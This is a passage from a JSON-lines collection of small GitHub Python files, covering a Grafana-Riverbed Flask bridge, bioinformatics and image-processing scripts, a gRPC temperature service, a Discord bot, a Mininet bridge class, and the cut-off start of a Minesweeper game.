],\n \"columns\": [\n \"app.name\",\n \"app.id\",\n \"start_time\",\n \"sum_web.pages\",\n \"web.page.family.id\",\n \"web.page.family.name\"\n ],\n \"filters\": [\n {\n \"value\": \"app.id == \"+sourceID,\n \"type\": \"STEELFILTER\",\n \"id\": \"rowFilter\"\n }]\n }\n ]}\n\n # dataDefs to json conversion \n dataDefsJSON = json.dumps(dataDefs)\n # Sending request and credentials to Riverbed\n responseSync = createSyncInstance(userCredentials, dataDefsJSON)\n # Response is parsed in order to access some fields\n parsed = json.loads(responseSync.text)\n # Trying to get results, if no result returns '0'\n try:\n allPageFamily = parsed['data_defs'][0][\"data\"]\n except KeyError as e:\n return \"0\"\n \n # Resetting the list in case of multiple page family row\n pageFamilyList = []\n for eachPageFamily in allPageFamily:\n # position in array from 0 to 5 : app.name, app.ip, timestamp, page.views, page.family.id, page.family.name\n pageID = str(eachPageFamily[4])\n pagename = str(eachPageFamily[5])\n # encoding is 99% sure useless\n pagename = pagename.encode()\n pagename.encode(encoding=\"ascii\",errors=\"backslashreplace\")\n # Keep both id and name, id will be extracted in /query\n pageFamilyIDandName = pagename + '@' + pageID\n pageFamilyList.append(pageFamilyIDandName)\n return jsonify(pageFamilyList)\n\n\n#########################################################################################################################\n## ##\n## RETRIEVING GRAFANA'S JSON && SENDING TO RIVERBED && SENDING RIVERBED RESPONSE ##\n## ##\n#########################################################################################################################\n@serverFlask.route(\"/query\", 
methods = ['POST'])\ndef query():\n    ##################################################################\n    ##               Gathering Grafana's data                      ##\n    ##################################################################\n    # This global variable is dedicated to page family gathering (route /getPageFamilyOptions)\n    # It stores the source id of every row so that route can reuse them\n    global globalAllRowSourceIDs\n    # List returned to Grafana, contains the results\n    dataPointsForGrafana = []\n    # Variable for debug purposes, distinguishing value 0 from no value\n    notDEFINEalarm = 0\n\n    # Catch the JSON sent by Grafana \n    grafanaFieldsForQuery = request.get_json()\n\n    # If you need to debug, enable these 3 lines to show the JSON sent by Grafana to the Python endpoint\n    # print('\\n\\n\\n###### BEGIN : JSON BUILT BY GRAFANA #######')\n    # print(json.dumps(grafanaFieldsForQuery, indent=4, sort_keys=True))\n    # print('###### END : JSON BUILT BY GRAFANA #######\\n\\n\\n')\n\n    # For each row of the Grafana query (A, B, C, D...)\n    for currentTarget in grafanaFieldsForQuery['targets']:\n\n        # RefId identifies one row in Grafana (A, B, C ...), automatically created by Grafana\n        grafanaRefId = currentTarget['refId']\n        grafanaRefIdNumber = string.lowercase.index(grafanaRefId.lower())\n\n        # sourceID is one of host_group.id, app.id (default is '')\n        try:\n            sourceID = currentTarget['targetID']\n        except KeyError as e:\n            continue\n        \n        globalAllRowSourceIDs[grafanaRefIdNumber] = sourceID\n\n        # SourceType is one of Host_group, Application, Application/HG, WebApp or PageFamily (combobox)\n        sourceType = currentTarget['type']\n\n        # Retrieving the times queried from Grafana's JSON (string epoch format needed)\n        queryTimeFrom = str(convert_to_epoch(grafanaFieldsForQuery['range']['from']))\n        queryTimeTo = str(convert_to_epoch(grafanaFieldsForQuery['range']['to']))\n\n        # Retrieving the metric queried by Grafana (default is '')\n        metricQueried = currentTarget['metricID']\n\n        # Retrieving the specified granularity; if granularity has not been set yet, the query is not ready (moving to next target . . 
.)\n try:\n granularityQueried = str(currentTarget['granularity'])\n except KeyError as e:\n granularityQueried = ''\n if granularityQueried == '':\n continue \n\n ##################################################################\n ## Building AppResponse query ##\n ##################################################################\n # Declaring all fields needed for a Riverbed creating instance request (data_defs)\n # If query is not ready, we stop here for this currentTarget, or Grafana will crash (due to Python error, route gives err500)\n if sourceType == 'Host group':\n # A host group query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"host_group.id\"]\n tableauColumns = [\"start_time\", \"host_group.id\", \"host_group.name\", metricQueried]\n filters_value1= \"host_group.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n\n if sourceType == \"Application\" :\n # A application query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n\n if sourceType == \"Application/HG\" :\n # A Application/HG query requires both a source (application), another source (host group) ,and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '' or currentTarget['secondTargetID'] =='':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n filters_value2= \"host_group.id == \"+currentTarget['secondTargetID']\n\n if sourceType == 'WebApp':\n # A WebApp query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"origin\": \"\",\n \"path\": \"aggregates:App\",\n \"type\": \"\",\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n if sourceType == 'PageFamily':\n familyPageID = currentTarget['pageFamilyID']\n # Extracting id\n familyPageID = familyPageID.split('@')\n familyPageID=familyPageID[1]\n # A PageFamily query requires both a source (id of page), and a metric (granularity has already been checked)\n if metricQueried == '' or familyPageID =='':\n continue\n tableauSource = {\n \"origin\": \"\",\n \"path\": \"aggregates:App\",\n \"type\": \"\",\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"web.page.family.id == \"+familyPageID\n filters_value2=\"\"\n\n # Implementing fields in data definition for Riverbed\n # Commentaries of the following object come from Riverbed support's documentation\n # The data definition (request) has the following properties: source, time, 
group_by, and filters\n        dataDefs = {'data_defs': [\n            {\n                # Data source to handle the data request. The source property is an object\n                # It has the following sub-properties: name (required) and path (optional)\n                'source': tableauSource,\n                # Specify the time duration of the data requests\n                # The time property also includes a few properties that help refine time-series requests.\n                \"time\": {\n                    # Epoch start time of the request, the start time is inclusive, the unit is seconds.\n                    \"start\": queryTimeFrom,\n                    # Epoch end time of the request, the end time is exclusive, the unit is seconds.\n                    \"end\": queryTimeTo,\n                    # This refers to the amount of time for which the data source computes a summary of the metrics it received\n                    # The data source examines all data and creates summaries for 1 minute, 5 minutes, 1 hour, 6 hours, and 1 day\n                    'granularity' : granularityQueried,\n                },\n                # The group_by property specifies the keys in the request. It is usually used to determine what kind of data is requested\n                # If the start_time (or end_time) column is in the group_by, then the request is considered time series\n                \"group_by\": tableauGroupBy,\n                # Request columns, the client can specify the requested key/metric columns, as well as their order\n                \"columns\": tableauColumns,\n                # The filters property is an array of filter objects (STEELFILTER is the default filter)\n                \"filters\": [\n                    {\n                        \"type\": \"STEELFILTER\",\n                        \"value\": filters_value1\n                    },\n                    {\n                        \"type\": \"STEELFILTER\",\n                        \"value\": filters_value2\n                    } ]\n            }]}\n\n        # Convert data_defs to JSON; JSON format is required by the Riverbed AppResponse server\n        dataDefsJSON = json.dumps(dataDefs)\n        \n        # The query is now ready to be sent to the Riverbed AppResponse probe\n\n        # Measure the time Riverbed needs for datapoint collection (if time > 50s, sync mode returns no data but still continues collecting the queried data)\n        # The important thing is, datapoint collection keeps running even if the API does not return the result (when collection is over, datapoints can be manually retrieved with the instance ID)\n        # Multiple requests > 50s may overload the probe; keep that in mind\n        timeSyncStart = time.time()\n        # Sending the datadefs to Riverbed and waiting for the response\n        syncReportFromRiverbed = createSyncInstance(userCredentials, dataDefsJSON)\n        # Save the collection time; if no datapoints are found in 'syncReportFromRiverbed' then timeToCollection will be checked [NOT IMPLEMENTED]\n        timeToCollection = round((time.time() - timeSyncStart),2)\n\n# If you need to debug, enable these 3 lines to show the JSON results sent by AppResponse\n    # print('\\n\\n\\n###### BEGIN RIVERBED JSON #######')\n    # print(json.dumps(syncReportFromRiverbed.json(), indent=4, sort_keys=True))\n    # print('###### END RIVERBED JSON #######\\n\\n\\n')\n\n\n        ##################################################################\n        ##               Gathering AppResponse's data                  ##\n        ##################################################################\n        # The response is parsed in order to access some fields\n        parsedReport = json.loads(syncReportFromRiverbed.text)\n\n        # WORKING, BUT THERE IS NO LONGER A DIFFERENCE BETWEEN VALUE=0 AND NO VALUE\n        # Remove this guard when debugging\n        try:\n            parsedReport[\"data_defs\"][0]['data']\n        except KeyError as e:\n            print(\"##### NO DATA POINT #####\")\n            continue\n\n        # caption will be the curve's caption\n        caption = parsedReport[\"data_defs\"][0]['data'][0][2]\n\n        # Label contains both the caption and the metric name\n        label = caption +' : '+ metricQueried\n\n        # valeurs is a list containing summary data from the Riverbed AppResponse probe\n        
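# each row follows the order requested in tableauColumns above: [start_time, app.id, app.name, <metric value>]\n        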
valeurs = parsedReport[\"data_defs\"][0]['data']\n\n        # datapoints is a list which will receive all datapoints in the correct format [value, timestamp]\n        datapoints = []\n\n        # Filling datapoints\n        for value in valeurs:\n            # The timestamp is at position value[0] as unicode; convert it to int in milliseconds (*1000)\n            # Adding 60 seconds to synchronize the probe's clock and Grafana's clock\n            timeStampInteger= (int(value[0])+60)*1000\n\n            # Depending on the format of the result\n            if type(value[3]) == type(unicode()) :\n                try:\n                    # Change unicode to float\n                    res = float(value[3])\n                except ValueError as e:\n                    # Encountered '#N/D', which means the data cannot be retrieved\n                    notDEFINEalarm = 1\n                    res = 0\n            # Change int to float\n            if type(value[3]) == type(int()) :\n                res = float(value[3])\n            # Change string to float \n            if type(value[3]) == type(str()) :\n                res = float(value[3])\n            # No change if a float is encountered\n            if type(value[3]) == type(float()) :\n                res = value[3]\n            # Adding the couple [value, timestamp] to the datapoints list\n            datapoints.append([res,timeStampInteger])\n\n        # Object representing each Grafana row (contains caption, meta information, row id, collection time, and datapoints)\n        newTarget = {\n            # target is the curve's caption\n            \"target\": label,\n            # meta is miscellaneous information\n            \"meta\" : { 'info 1' : \"nothing\"},\n            # refId is the letter of the row (A, B, C, D ...)\n            'refId' : grafanaRefId,\n            # collectionTime is the time needed to complete the query, sync must be <50 [REQUIRES MORE THAN THE DATASOURCE PLUGIN TO BE USEFUL]\n            'collection time' : timeToCollection,\n            # datapoints is a list containing all points retrieved by the Riverbed AppResponse probe\n            \"datapoints\": datapoints \n        }\n        # Each target (or row) is inserted into a list (to be sent to Grafana)\n        dataPointsForGrafana.append(newTarget)\n    \n    # For debug purposes, warn if a not-defined value was encountered\n    if notDEFINEalarm == 1 :\n        print('################################# = <#N/D> ALARM ################################################')\n\n    # Finally, send the data to Grafana in JSON format\n    return jsonify(dataPointsForGrafana) \n\n# Server started, accepts external connections on port 0000, debug set to False in order to avoid security issues\nif (__name__ == \"__main__\"):\n    serverFlask.run(host = '0.0.0.0', port = 0000, debug=False)","repo_name":"Crinon/outDated-Grafana-Datasource-Plugin-For-Riverbed-AppResponse","sub_path":"flaskServerAppResponseForGrafana.py","file_name":"flaskServerAppResponseForGrafana.py","file_ext":"py","file_size_in_byte":38784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"5935539951","text":"def pr(text, profile):\r\n    k = len(text)\r\n    pro = 1.0\r\n    for i in range(k):\r\n        pro *= profile[text[i]][i]\r\n    return pro\r\n\r\n\r\ndef profile_most_probable_kmer(text, k, profile):\r\n    loop = len(text) - k + 1\r\n    score = -1\r\n    proba = ''\r\n    for i in range(loop):\r\n        pattern = text[i:i+k]\r\n        patty = pr(pattern, profile)\r\n        if patty > score:\r\n            proba = pattern\r\n            score = patty\r\n    return proba\r\n\r\n\r\nprofil = {'A': [0.125, 0.125, 0.25], 'C': [0.5, 0.375, 0.125], 'G': [0.125, 0.125, 0.25], 'T': [0.25, 0.375, 0.375]}\r\nkmer = []\r\nfor i in range(4):\r\n    pat = input()\r\n    kmer.append(profile_most_probable_kmer(pat, 3, profil))\r\nfor m in kmer:\r\n    
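# one most-probable k-mer is printed per input string, in input order\r\n    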
print(m)\r\n\r\n","repo_name":"Marzan1/Biology-Meets-Programming","sub_path":"profile_most_probable_kmer.py","file_name":"profile_most_probable_kmer.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3786996684","text":"import argparse, elasticsearch, json, re\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\ndef overlap(a,b,stopwords):\n filtered_a = set([ x.lower() for x in re.sub(r'\\W+', ' ', a).split() ]) - stopwords\n filtered_b = set([ x.lower() for x in re.sub(r'\\W+', ' ', b).split() ]) - stopwords\n\n return filtered_a & filtered_b\n\ndef load_stopwords():\n sw = []\n with open('../stopwords-pt.txt', 'r') as f:\n for l in f:\n sw.append(l.strip())\n return set(sw)\n\ndef oab_questions(es):\n doc = {\n 'size' : 5000,\n 'query': {\n 'match_all' : {}\n }\n }\n\n res = es.search(index=\"oab\", doc_type='doc', body=doc)\n\n for r in res['hits']['hits']:\n yield r['_source']\n\ndef search_corpus(es, search_text):\n query = {\n 'query': {\n 'match': {\n 'text': search_text\n }\n }\n }\n\n res = es.search(index=\"corpus\", doc_type=\"sentence\", body=query)\n\n score = res['hits']['hits'][0]['_score']\n text = res['hits']['hits'][0]['_source']['text']\n filename = res['hits']['hits'][0]['_source']['filename']\n return (score, text, filename)\n\ndef main():\n es = Elasticsearch(['http://localhost:9200/'])\n\n sw = load_stopwords()\n\n for q in oab_questions(es):\n oab_enum = q['enum'].replace('\\n', ' ')\n oab_filename = q['filename']\n oab_number = q['number']\n oab_options = q['options']\n\n max_score = 0\n selected_option = { 'letter': '?', 'text': 'N/A', 'correct': None }\n justification = \"N/A\"\n\n for o in oab_options:\n enum_plus_option = oab_enum + ' ' + o['text']\n\n (score, text, filename) = search_corpus(es, enum_plus_option)\n\n if len(overlap(enum_plus_option, text, sw)) > 0:\n if score > max_score:\n max_score = score\n selected_option = o\n justification = \"[{}] {}\".format(filename, text)\n\n row = [oab_filename, oab_number,\n oab_enum, selected_option['letter'], selected_option['text'], justification, str(selected_option['correct'])]\n print(\"\\t\".join(row))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pdelfino/oab-exams","sub_path":"experiments/IR/ir.py","file_name":"ir.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"28048052887","text":"# Homework 1, Task 1 - Divide an image in patches and saves them to the disk as a patch with series names\n\nimport cv2 as cv\n\nimage = cv.imread('image.jpg') # reading image from directory\n\nimage_height = image.shape[0] # put image's height to variable\nimage_width = image.shape[1] # put image's width to variable\n\nm = int(image_height / 3) # how many patches is needed to divide an image\nn = int(image_width / 3)\n\nk = 100\n\n# dividing an image to patches, and saving them to images\nfor y in range(0, image_height, m):\n for x in range(0, image_width, n):\n if (image_height - y) < m or (image_width - x) < n:\n break\n\n x1 = x + n\n y1 = y + m\n\n if x1 >= image_width and y1 >= image_height:\n x1 = image_width - 1\n tiles = image[y:y + m, x:x + n]\n cv.imwrite('saved_patches/' + str(k + 3) + '.jpg', tiles)\n cv.rectangle(image, (x, y), (x1, y1), (0, 255, 0), 1)\n elif y1 <= image_height:\n y1 = image_height - 1\n tiles = image[y:y + m, x:x + n]\n cv.imwrite('saved_patches/' + str(k + 
3) + '.jpg', tiles)\n            cv.rectangle(image, (x, y), (x1, y1), (0, 255, 0), 1)\n\n        k += 1\n","repo_name":"MustafinMaksim/fundamentals-of-robotics","sub_path":"Homework 1/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"31798797749","text":"import math\n\nstyle = ('Courier', 20, 'italic') \n\ndef squared(x):\n    return x * x\n\ndef start(board, turtle):\n    board.reset()\n    # Given sides a and b, draw the parallelogram\n    turtle.title(\"Parallelogram\")\n\n    a = board.screen.numinput(\"Given\", \"Enter a\")\n    b = board.screen.numinput(\"Given\", \"Enter b\")\n\n    board.home()\n    board.forward(b)\n\n    board.home()\n    board.left(60)\n    board.forward(a)\n    board.right(60)\n    board.forward(b)\n    board.right(120)\n    board.forward(a)\n    board.penup()\n\n    baseCenter = (b/2)\n    board.goto(baseCenter, -20) # y at -20 units writes below the parallelogram\n    board.write('b', font=style, align='left') # a label at the base\n\n    board.goto(-250, 100)\n    board.write('a = {}'.format(a), font=style, align='left')\n    board.goto(-250, 80)\n    board.write('b = {}'.format(b), font=style, align='left')","repo_name":"meriampdev/python-geometry","sub_path":"quadrilaterals/Parallelogram.py","file_name":"Parallelogram.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"9713486239","text":"x = int(input(\"Enter number \"))\nguess = 1.0\n#while ((guess*guess - x) > 0.00001) or ((x - guess*guess) > 0.00001):\nwhile abs(guess**2 - x) > 0.00001:\n\tguess = (guess + x/guess)/2\n\tprint (\"Intermediate result: \",guess)\n\t\nprint (\"-\"*10,\"\\nFinal Result: \",guess,\"\\n\",\"-\"*10, sep='')\n\n# Do the same thing, but in a function\ndef sqrt_guess(x):\n\tguess = 1.0\n\twhile abs(guess**2 - x) > 0.00001:\n\t\tguess = (guess + x/guess)/2\n\treturn guess\n\n# Invoke the function and print the result\t\nprint(\"\\n{:5.3f} returned by function\".format(sqrt_guess(x)))\n","repo_name":"mcgettin/ditOldProgramming","sub_path":"yr2/sem1/sample-programs/sqrtNewton3.py","file_name":"sqrtNewton3.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"11135457840","text":"##### Data Understanding\n\n# Importing Libraries\nimport pandas as pd\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.width', 500)\npd.set_option('display.expand_frame_repr', False)\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\n\n# Importing Data\n\ndf = pd.read_excel(\"datasets/online_retail_II.xlsx\", sheet_name=\"Year 2010-2011\")\n\n\n##### Descriptive Statistics\n\ndf.shape # Dimension of dataframe\n\ndf.dtypes # Data type of each variable\n\ndf.info() # Print a concise summary of the DataFrame\n\ndf.head() # First 5 observations of dataframe\n\ndf.tail() # Last 5 observations of dataframe\n\n\n\ndef outlier_thresholds(dataframe, variable):\n    quartile1 = dataframe[variable].quantile(0.01)\n    quartile3 = dataframe[variable].quantile(0.99)\n    interquantile_range = quartile3 - quartile1\n    up_limit = quartile3 + 1.5 * interquantile_range\n    low_limit = quartile1 - 1.5 * interquantile_range\n    return low_limit, up_limit\n\ndef replace_with_thresholds(dataframe, variable):\n    low_limit, up_limit = outlier_thresholds(dataframe, variable)\n    dataframe.loc[(dataframe[variable] < low_limit), 
variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\n\n\n##### Data Preparation\n########################## Task-1 ##########################\ndf.dropna(inplace=True) # Remove missing observations from the data set\n\ndf = df[~df[\"Invoice\"].str.contains(\"C\", na=False)] # Delete operation if it starts with C in \"Invoice\".\n\ndf = df[df[\"Quantity\"] > 0]\ndf = df[df[\"Price\"] > 0]\n\n# Functions required to delete outliers\nreplace_with_thresholds(df, \"Quantity\")\nreplace_with_thresholds(df, \"Price\")\n\ndf.head()\n\n####### Invoice-Product Matrix\n\n########################## Task-2 ##########################\n\ndf_ge = df[df[\"Country\"] == \"Germany\"]\n\ndf_ge.groupby([\"Invoice\", \"Description\"]).agg({\"Quantity\": \"sum\"})\n\n\ndf_ge.groupby([\"Invoice\", \"Description\"]).agg({\"Quantity\": \"sum\"}).unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0).iloc[0:5, 0:5].head()\n\n\n# functionalization of transactions\ndef create_invoice_product_df(dataframe, id=False):\n if id:\n return dataframe.groupby(['Invoice', \"StockCode\"])['Quantity'].sum().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\n else:\n return dataframe.groupby(['Invoice', 'Description'])['Quantity'].sum().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\n\n\n\nge_inv_pro_df = create_invoice_product_df(df_ge, id=True)\nge_inv_pro_df.head()\n\ndef check_id(dataframe, stock_code):\n product_name = dataframe[dataframe[\"StockCode\"] == stock_code][[\"Description\"]].values[0].tolist()\n return product_name\n\n\n\n########################## Task-3 ##########################\n\n# User 1 product id: 21987\n# User 1 product id: 23235\n# User 1 product id: 22747\n\nl = [21987, 23235, 22747]\nfor index, product in enumerate(l):\n print(\"Product Name \" + str(index) + \": \" + str(check_id(df_ge, product)))\n\n\n\n\n########################## Task-4 ##########################\n\n############# Enforcement of Association Rules\n\n# Possibilities of all possible product combinations\nfrequent_itemsets = apriori(ge_inv_pro_df, min_support=0.01, use_colnames=True)\nfrequent_itemsets.sort_values(\"support\", ascending=False).head()\n\n\n# Enforcement of Association Rules:\nrules = association_rules(frequent_itemsets, metric=\"support\", min_threshold=0.01)\nrules.sort_values(\"support\", ascending=False).head()\nrules.sort_values(\"lift\", ascending=False).head(50)\n\n\n# Product recommendation for users in the cart to be done\ndef arl_recommender(rules_df, product_id, rec_count=1):\n sorted_rules = rules_df.sort_values(\"lift\", ascending=False)\n recommendation_list = []\n\n for i, product in sorted_rules[\"antecedents\"].items():\n for j in list(product):\n if j == product_id:\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"]))\n\n recommendation_list = list({item for item_list in recommendation_list for item in item_list})\n\n return recommendation_list[:rec_count]\n\ncheck_id(df, 21987)\narl_recommender(rules, 21987, 3)\n\n\n########################## Task-5 ##########################\n\n# Recommended products for all users according to their product id\nfor product in l:\n print(\"Product Name \" + str(product) + \": \" + str(check_id(df_ge, product)) + \" Recommended Product: \" + str([check_id(df_ge, i) for i in arl_recommender(rules, product, 3)]))\n\n\n# with list comprehension\n[\"Product Name \" + str(product) + \": \" + str(check_id(df_ge, product)) + \" Recommended Product: \" + str([check_id(df_ge, i) for i in 
arl_recommender(rules, product, 3)]) for product in l]","repo_name":"mehmettuzcu/recommendation_systems","sub_path":"association_rule_learning_recommender.py","file_name":"association_rule_learning_recommender.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30958923407","text":"from concurrent import futures\nimport logging\n\nimport grpc\nimport EmployeeService_pb2\nimport EmployeeService_pb2_grpc\n\nall_data = [{'id':1,'date':'15/01/2023','local':'Recife','temperature':31},{'id':2,'date':'20/12/2022','local':'Salvador','temperature':28},{'id':3,'date':'22/12/2022','local':'Manaus','temperature':25},{'id':4,'date':'25/12/2022','local':'Rio de Janeiro','temperature':30},{'id':5,'date':'26/12/2022','local':'Fortaleza','temperature':32},{'id':6,'date':'27/12/2022','local':'Brasilia','temperature':15},{'id':7,'date':'01/01/2023','local':'Porto Alegre','temperature':18},{'id':8,'date':'05/01/2023','local':'Goiânia','temperature':25},{'id':9,'date':'10/01/2023','local':'Sao Paulo','temperature':20},{'id':10,'date':'15/01/2023','local':'Belo Horizonte','temperature':27}]\n\nclass TemperatureService(EmployeeService_pb2_grpc.TemperatureServiceService):\n    def InsertTemperature(self, request, context):\n        data = {\n            'id': request.id,\n            'date': request.date,\n            'local': request.local,\n            'temperature': request.temperature\n        }\n        all_data.append(data)\n        return EmployeeService_pb2.StatusReply(status='OK')\n\n    def GetTemperatureByID(self, request, context):\n        usr = [item for item in all_data if (item['id'] == request.id)]\n\n        return EmployeeService_pb2.Temperature(id=usr[0]['id'], date=usr[0]['date'], local=usr[0]['local'],\n                                               temperature=usr[0]['temperature'])\n\n    def GetTemperatureByDate(self, request, context):\n        filtered_list = [item for item in all_data if (item['date'] == request.date)]\n        list = EmployeeService_pb2.TemperatureList()\n        for item in filtered_list:\n            emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n                                                       local=item['local'],\n                                                       temperature=item['temperature'])\n            list.temperature_data.append(emp_date)\n        return list\n\n    def GetTemperatureByLocal(self, request, context):\n        filtered_list = [item for item in all_data if (item['local'] == request.local)]\n        list = EmployeeService_pb2.TemperatureList()\n        for item in filtered_list:\n            emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n                                                       local=item['local'],\n                                                       temperature=item['temperature'])\n            list.temperature_data.append(emp_date)\n        return list\n\n    def ListAllData(self, request, context):\n        list = EmployeeService_pb2.TemperatureList()\n        for item in all_data:\n            emp_date = EmployeeService_pb2.Temperature(id=item['id'], date=item['date'],\n                                                       local=item['local'],\n                                                       temperature=item['temperature'])\n            list.temperature_data.append(emp_date)\n        return list\n\n\ndef serve():\n    server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n    EmployeeService_pb2_grpc.add_TemperatureServiceService_to_server(TemperatureService(), server)\n    server.add_insecure_port('[::]:50051')\n    server.start()\n    server.wait_for_termination()\n\n\nif __name__ == '__main__':\n    logging.basicConfig()\n    
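# serve() blocks here until the gRPC server is terminated\n    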
serve()\n","repo_name":"DistributedSystems-UFG/simple-web-server-with-grpc-arthur-vinicius","sub_path":"python/EmployeeService.py","file_name":"EmployeeService.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11739919730","text":"from discord.ext import commands\nfrom discord.ext.commands import Cog\nfrom discord.ext.commands import Context\nfrom discord.utils import oauth_url\nfrom discord.embeds import Embed\nfrom discord.permissions import Permissions\n\nfrom bot.bot import JeongBalBot\nfrom bot.utils.embeds import pleaseWait\n\n\nclass General(Cog):\n def __init__(self, bot: JeongBalBot) -> None:\n self.bot = bot\n\n @commands.command(name=\"초대\")\n async def invite(self, ctx: Context) -> None:\n \"\"\"\n 정발고 봇의 초대 링크를 보여줍니다.\n 인자값: `..초대`\n \"\"\"\n url = oauth_url(self.bot.user.id, permissions=Permissions(8))\n await ctx.send(embed=Embed(title=\"정발고 봇 초대 링크\", url=url))\n\n @commands.command(name=\"help\")\n async def help(self, ctx: Context) -> None:\n msg = await ctx.send(embed=pleaseWait)\n embed = Embed(title=\"명령어 목록\")\n command_list = [\n command\n for command in self.bot.commands\n if command.name not in [\"jishaku\", \"help\"]\n ]\n for command in command_list:\n embed.add_field(name=command.name, value=command.help, inline=False)\n await msg.edit(embed=embed)\n\n\ndef setup(bot: JeongBalBot) -> None:\n bot.add_cog(General(bot))\n","repo_name":"jeongbal/bot","sub_path":"bot/cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"37524403631","text":"\"\"\"\nNode Library for Mininet\n\nThis contains additional Node types which you may find to be useful.\n\nMettre dans /usr/lib/python2.7/dist-packages/mininet/\n\"\"\"\n\nfrom mininet.node import Node, Switch\nfrom mininet.log import setLogLevel, info\n\nclass LinuxBridge( Switch ):\n \"Linux Bridge (with optional spanning tree)\"\n\n nextPrio = 100 # next bridge priority for spanning tree\n\n def __init__( self, name, stp=False, prio=None, **kwargs ):\n \"\"\"stp: use spanning tree protocol? 
(default False)\n           prio: optional explicit bridge priority for STP\"\"\"\n        self.stp = stp\n        if prio:\n            self.prio = prio\n        else:\n            self.prio = LinuxBridge.nextPrio\n            LinuxBridge.nextPrio += 1\n        Switch.__init__( self, name, **kwargs )\n\n    def connected( self ):\n        \"Are we forwarding yet?\"\n        if self.stp:\n            return 'forwarding' in self.cmd( 'brctl showstp', self )\n        else:\n            return True\n    \n    def start( self, controllers ):\n        self.cmd( 'ifconfig', self, 'down' )\n        self.cmd( 'brctl delbr', self )\n        self.cmd( 'brctl addbr', self )\n        if self.stp:\n            self.cmd( 'brctl setbridgeprio', self.prio )\n            self.cmd( 'brctl stp', self, 'on' )\n        for i in self.intfList():\n            if self.name in i.name:\n                self.cmd( 'brctl addif', self, i )\n        self.cmd( 'ifconfig', self, 'up' )\n\n    def stop( self ):\n        self.cmd( 'ifconfig', self, 'down' )\n        self.cmd( 'brctl delbr', self )\n\n","repo_name":"molusq/polydrive","sub_path":"SI3/S5/Architecture et Réseaux/Réseaux/Ancien/TP3/ressources/nodelib.py","file_name":"nodelib.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5508072136","text":"from tkinter import Button, Label\r\nimport random\r\nimport settings\r\nimport ctypes\r\nimport sys\r\nimport time\r\n\r\n\r\nclass Cell:\r\n    all = []\r\n    cell_count_label_object = None\r\n    cell_count = settings.CELL_COUNT\r\n\r\n    def __init__(self, x, y, is_mine=False):\r\n        self.is_mine = is_mine\r\n        self.is_opened = False\r\n        self.is_marked = False\r\n        self.cell_button_object = None\r\n        self.x = x\r\n        self.y = y\r\n        Cell.all.append(self)\r\n\r\n    def create_btn_object(self, frame):\r\n        btn = Button(\r\n            frame,\r\n            width=7,\r\n            height=3,\r\n            # text=f'{self.x},{self.y}'\r\n        )\r\n        btn.bind('<Button-1>', self.left_click_actions)\r\n        btn.bind('<Button-3>', self.right_click_actions)\r\n        self.cell_button_object = btn\r\n\r\n    @staticmethod\r\n    def create_cell_count_label(frame):\r\n        lbl = Label(\r\n            frame,\r\n            text=f\"Cells Left:{Cell.cell_count}\",\r\n            width=12,\r\n            